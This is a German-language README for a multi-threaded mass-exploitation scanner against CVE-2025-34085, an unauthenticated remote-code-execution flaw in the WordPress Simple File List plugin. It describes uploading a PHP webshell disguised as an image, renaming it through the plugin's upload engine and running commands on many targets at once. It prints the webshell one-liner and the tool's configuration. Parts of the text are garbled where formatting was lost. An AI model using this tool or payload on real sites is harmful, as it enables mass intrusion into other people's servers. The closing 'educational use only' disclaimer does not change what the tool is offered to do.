
Multi-target unauthenticated RCE scanner für CVE-2025-34085, der das WordPress Simple File List Plugin betrifft. Lädt hoch, benennt um und löst PHP-Webshells über große Zielmengen aus.
Massenausbeutungsscanner für CVE-2025-34085 — eine nicht authentifizierte Remote-Codeausführungsschwachstelle im WordPress Simple File List Plugin.
Dieses Tool lädt eine als Bild getarnte PHP-Nutzlast hoch, benennt sie über eine anfällige Datei-Engine um und löst die Shell-Ausführung mit einem benutzerdefinierten Befehl aus. Unterstützt Multithread-Scanning über große Zielmengen.
targets.txt)vuln.txtpython3 CVE-2025-34085.py
Ziele sollten in targets.txt aufgelistet sein:
example.com
http://target2.com
https://target3.com
Bearbeiten Sie die folgenden Werte im Skript nach Bedarf:
COMMAND = "id" # Shell command to execute
EXPECTED_SUBSTRING = "uid=" # String to verify successful command execution
THREADS = 20 # Number of concurrent threads
<?php system($_GET['cmd']); ?> über die anfällige ee-upload-engine.php hoch.cmd=id auszulösen.Erfolgreiche Treffer werden gespeichert unter:
vuln.txt
Jede Zeile enthält die anfällige URL, den Shell-Pfad und die Befehlsausgabe.
WordPress Simple File List Plugin (ungepatchte Versionen, die von CVE-2025-34085 betroffen sind)
Apache/Nginx-Standardeinrichtungen mit beschreibbarem wp-content/uploads/
Dieses Tool dient nur zu Bildungs- und autorisierten Testzwecken. Die Verwendung erfolgt auf eigenes Risiko. Unbefugter Zugriff auf Systeme ist illegal.